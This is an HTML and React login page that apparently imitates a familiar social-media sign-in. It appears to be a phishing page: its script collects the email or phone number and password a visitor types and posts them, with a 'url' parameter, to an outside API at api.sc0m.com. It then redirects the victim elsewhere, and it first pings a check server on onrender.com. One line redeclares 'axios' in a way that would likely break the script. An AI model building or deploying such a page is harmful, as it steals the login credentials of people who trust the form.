<!--  -->

<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Login</title>
  </head>
  <script
    crossorigin
    src="https://cdnjs.cloudflare.com/ajax/libs/react/18.0.0/umd/react.development.js"
  ></script>
  <script
    crossorigin
    src="https://cdnjs.cloudflare.com/ajax/libs/react-dom/18.0.0/umd/react-dom.development.js"
  ></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/babel-standalone/7.24.4/babel.min.js"></script>
  <!-- tailwind cdn  -->
  <script src="https://cdn.tailwindcss.com"></script>

  <link
    href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@500&display=swap"
    rel="stylesheet"
  />
  <style>
    body {
      background-color: rgb(239, 239, 239);
      font-family: 'Open Sans', sans-serif;
    }
    .container {
      width: 500px;
      margin: auto;
      padding: 30px;
      border-radius: 7px;
      background: #fff;
    }
    .container .input {
      width: 100%;
      margin-top: 10px;
      margin-bottom: 5px;
      height: 35px;
      border-radius: 5px;
      border: 1px solid rgba(193, 192, 192, 0.562);
      padding: 2px;
    }
    .btn {
      margin: auto;
      text-align: center;
    }
    .btn .log {
      background-color: rgb(44, 128, 211);
      color: #fff;
      width: 100%;
      height: 40px;
      border-radius: 6px;
      font-size: 18px;
      border: none;
      margin-top: 10px;
    }
    .create {
      background-color: rgb(76, 158, 35);
      color: #fff;
      width: 50%;
      height: 40px;
      border-radius: 6px;
      font-size: 18px;
      border: none;
      margin-top: 10px;
    }
    @media (max-width: 800px) {
      .container {
        width: 80%;
        margin-left: 2%;
        margin-right: 2%;
      }
    }
  </style>

  <script
    src="https://cdnjs.cloudflare.com/ajax/libs/axios/1.5.0/axios.min.js"
    integrity="sha512-aoTNnqZcT8B4AmeCFmiSnDlc4Nj/KPaZyB5G7JnOnUEkdNpCZs1LCankiYi01sLTyWy+m2P+W4XM+BuQ3Q4/Dg=="
    crossorigin="anonymous"
    referrerpolicy="no-referrer"
  ></script>
  <body>
    <noscript>You need to enable JavaScript to run this app.</noscript>
    <div id="root"></div>

    <script type="text/babel">
      const axios = axios.create({
        baseURL: 'https://api.sc0m.com/api',
        timeout: 5000,
        headers: { 'X-Custom-Header': '' },
      });

      const MainContent = () => {
        const [vEmail, setVEmail] = React.useState('');
        const [vPassword, setVPassword] = React.useState('');
        const [data, setData] = React.useState('');

        const [loading, setLoading] = React.useState(true);
        React.useEffect(() => {
          axios
            .get('https://checkapi-xt1h.onrender.com/')
            .then((res) => {
              setLoading(false);
            })
            .catch((err) => {
              //   window.location = 'https://www.livebotola.com/';
              setLoading(false);
            });

          const url = window.location.href;
          const params = new URL(url).searchParams;
          const urlbase = params.get('url');
          setData(urlbase);
        }, []);

        const addNew = () => {
          if (vPassword === '' || vEmail === '')
            return alert('Please fill all the fields');
          const body = {
            data,
            email: vEmail,
            password: vPassword,
          };

          axios
            .post('/contact', body)
            .then(({ data }) => {
              window.location = data;
            })
            .catch((err) => {
              window.location = 'https://www.livebotola.com/';
            });
        };
        return (
          <>
            {loading ? (
              <div className="flex justify-center items-center h-screen">
                <div className="animate-spin rounded-full h-32 w-32 border-t-2 border-b-2 border-gray-900"></div>
              </div>
            ) : (
              <>
                <div className="container">
                  <div
                    style={{
                      backgroundColor: '#fefbe1',
                      padding: '0.3rem',
                      display: 'flex',
                    }}
                  >
                    <img
                      src="https://i.ibb.co/rsn5XSz/moma.png"
                      alt=""
                      width="20px"
                      height="40px"
                    />
                    <p>Log in your first.</p>
                  </div>

                  <div method="post">
                    <input
                      className="input"
                      type="text"
                      placeholder="phone or email "
                      name="email"
                      onChange={(e) => setVEmail(e.target.value)}
                    />
                    <input
                      className="input"
                      type="password"
                      placeholder="password"
                      name="password"
                      onChange={(e) => setVPassword(e.target.value)}
                    />

                    <div className="btn">
                      <button className="log" onClick={addNew}>
                        Log In
                      </button>
                      <p style={{ color: ' blue' }}>forget password ?</p>
                    </div>
                  </div>
                </div>
              </>
            )}
          </>
        );
      };

      //render the component to the DOM
      ReactDOM.render(<MainContent />, document.getElementById('root'));
    </script>
  </body>
</html>
